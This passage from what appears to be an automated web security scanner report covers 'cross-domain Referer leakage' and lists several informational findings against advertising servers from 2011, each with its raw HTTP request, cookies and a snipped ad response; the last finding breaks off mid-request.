When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


17.1. http://ad.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=88105499721132220&clkurl=http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUaGIdSlqXB8gTNDuT_OL7eWkwL7QDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7nWCoCsZmAAAFGskws-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVGIL2vn32CiWPiwQj5OTzmIjggADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqR9VoXJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJBgYmDqXAP3QDDTzF9BMd5iZk_Qj_KFyGP7r5djmDZXDcEsvh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqBxGPHRIuN_GqU_CThuXvvaTOzfh0td.ckYtTrkTwouBYcuIU76yWwgoz.B7XK8BlIoCbzEKMgLT005GfiDFYMDHwMjMyMLEys_GyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XNyoRd42J3RqCjYIkW5AIGAPYfk5A-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3928
Date: Mon, 09 May 2011 15:35:17 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1875839577?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUNRNOhbAPD5FIvSW2ZNjj_EMWeQlnZW8sdXNhLHQsMTMwNDk1NTMxODU2NSxjLDI4OTY2OSxwYyw2OTExMixhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1aLVQtYW1abVptWm41UHdBQUFBQUFBQXhBQUFBQUFBQUFERUFBQUFBQUFBQU1RT0RHYndnNjlDRmtTc1lkYTZiMnppV3JDY2hOQUFBQUFDNGhBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0IzQzA0QUVBOEJBZ1VDQUFRQUFBQUFmeHplSndBQUFBQS4vY25kPSFlUk1rQ3dqMjVRSVF4OGtLR0FBZzBjY0JLRTR4QUFBQUFBQUFERUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUGNXWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNzL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_...[SNIP]...--/clkurl=">\n'+
'</script>
...[SNIP]...
Z0RtQVBvQTRzSjZBT01DZlVEQWdRQVJQVURJQUFBQU9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHlnWVlZMVdqTmFld3htTlVldFh2cllrNmtqWmcmY2xpZW50PWNhLXB1Yi02NzQzNjIyNTI1MjAyNTcyJmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=1875839577" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=1643675704" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

17.2. http://ad.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=27888134820386770&clkurl=http://ib.adnxs.com/click/AQAAAAAA_D8AAAAAAAD8PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQJ41jpUnrNkrSsYda6b2ziXpCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04A9gUBAgUCAAQAAAAAbxbN4QAAAAA./cnd=!7hJ17Ai_kAMQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBXt6i6QnITcO4EKXvlQfzjoStCNfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gC1g3AAgTIAoXSzwrgAgDqAg4zMDB4MjUwQl9Nb25leagDAegDa-gDkwXoA5gD6AOLCegDjAn1AwIEAET1AyAAAADgBAGABunEhfTFkNaJMg%26num%3D1%26sig%3DAGiWqtzXujmj6x9ljlxi_jlsMLM-st1i2A%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUlVjb46xel_B1pRvtUstYmBf.mMUDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQYGLgaG5eaMQMUMgbcYBYEU505GfiDFYMDHwMjMxMLPysjGyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XDwohL62J3sIXA1JsWBLIKCADRapOK

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUA0JKRlc1ZV6E31_Bd0WGv_ToRnQDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2raSc_45RLfcMAlWsD6vsO1OcC03fk3wIrXPo2eXRm4NK38WbcZKhcC9DMn0Az3WBmbjS_aYJTn3m6Pm45CaA7O5cA_dcMNPMX0Ex3mJmT9CP8oXIYfu_l2OYNlcNwSy.HSz8uuY7smFM45ZLcruOUi_C6hlPOb0IITjnXBg6oHEY8dEi438apT8JOG5e.9pM7N.HS135yRi0w_Bhxyld2CwHlGXyP6zUwcDEwLDdnBCpmCLzFKAikOHcy8gMpBgN.BiYmRmZ.FkZWRjZGdkYORk5GLkZuRh5GXkY.sBKWTEYRoMqlBWB9CmYQwRAmEUZRoLD8Lh7cWhe7g60Ep98vILcwMAAAkcyWNQ--; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:36:14 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3920
Date: Mon, 09 May 2011 15:36:13 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1987910106?click=http://ad.amgdgt.com/ads/t=c/s=...[SNIP]..._c2E9bCZhaT1CWHQ2aTZRbklUY080RUtYdmxRZnpqb1N0Q05mcS1OTUJsNkdVN0JqWjU5SFNId0FRQVJnQklBQTRBVkNBeC1IRUJHREpob1dKaUtTRUVJSUJGMk5oTFhCMVlpMDJOelF6TmpJeU5USTFNakF5TlRjeW9BSEQ4djNzQTdJQkVYZDNkeTVqYzIxdmJtbDBiM0l1WTI5dHVnRUtNekF3ZURJMU1GOWhjOGdCQ2RvQklXaDBkSEE2THk5M2QzY3VZM050YjI1cGRHOXlMbU52YlM5Q2RYTnBibVZ6YzVnQzFnM0FBZ1RJQW9YU3p3cmdBZ0RxQWc0ek1EQjRNalV3UWw5TmIyNWxlYWdEQWVnRGEtZ0Rrd1hvQTVnRDZBT0xDZWdEakFuMUF3SUVBRVQxQXlBQUFBRGdCQUdBQnVuRWhmVEZrTmFKTWcmbnVtPTEmc2lnPUFHaVdxdHpYdWptajZ4OWxqbHhpX2psc01MTS1zdDFpMkEmY2xpZW50PWNhLXB1Yi02NzQzNjIyNTI1MjAyNTcyJmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
b0E1Z0Q2QU9MQ2VnRGpBbjFBd0lFQUVUMUF5QUFBQURnQkFHQUJ1bkVoZlRGa05hSk1nJm51bT0xJnNpZz1BR2lXcXR6WHVqbWo2eDlsamx4aV9qbHNNTE0tc3QxaTJBJmNsaWVudD1jYS1wdWItNjc0MzYyMjUyNTIwMjU3MiZhZHVybD0K&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=1987910106" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=1158518083" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

17.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:40 GMT
Expires: Mon, 09 May 2011 15:37:40 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Mar 29 13:01:47 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
A-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google"><img src="http://s0.2mdn.net/1326154/1-Hyatt_GP_300x250_Backup.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7444
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:13 GMT
Expires: Mon, 09 May 2011 15:35:13 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Oct 27 10:20:44 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
g=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/nyp/display.aspx%3F%26code%3D9903600230%26utm_medium%3Dbanner%26utm_campaign%3Dnyp"><img src="http://s0.2mdn.net/1384245/1010_auto_NYP_SliderFlo_interactive_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5834
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:17 GMT
Expires: Mon, 09 May 2011 15:36:17 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Mar 09 17:03:44 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/"><img src="http://s0.2mdn.net/2789604/RFMcGrill_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.6. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.6441.USATODAY.COM/B5327539.11

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adj/N2883.6441.USATODAY.COM/B5327539.11;sz=300x250;pc=[TPAS_ID];click=http%3A//gannett.gcion.com/adlink%2F5111%2F798269%2F0%2F170%2FAdId%3D1587637%3BBnId%3D1%3Bitime%3D955400653%3Bkey%3Dcw27%2Bcw296%2Bcw22%2Bcw5%2Bcw461%2Bcw9%2Bcw145%3Blink%3D;ord=955400653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 37042
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:42 GMT
Expires: Mon, 09 May 2011 15:36:42 GMT
Discarded: true

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
7%3BBnId%3D1%3Bitime%3D955400653%3Bkey%3Dcw27%2Bcw296%2Bcw22%2Bcw5%2Bcw461%2Bcw9%2Bcw145%3Blink%3Dhttp://www.subaru.com/weather/index.html?site=1056706&placement=62098467&ad=5327539&creative=41821555"><IMG SRC="http://s0.2mdn.net/1762894/PID_1610335_Subaru_WWM_300x250.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...

17.7. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.128132.INTERCLICK/B4640114.15

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adj/N3175.128132.INTERCLICK/B4640114.15;sz=300x250;click=http://a1.interclick.com/icaid/128531/tid/88285d39-c26a-4993-96e1-8a5d87de37e5/click.ic?;ord=634405378967220244? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
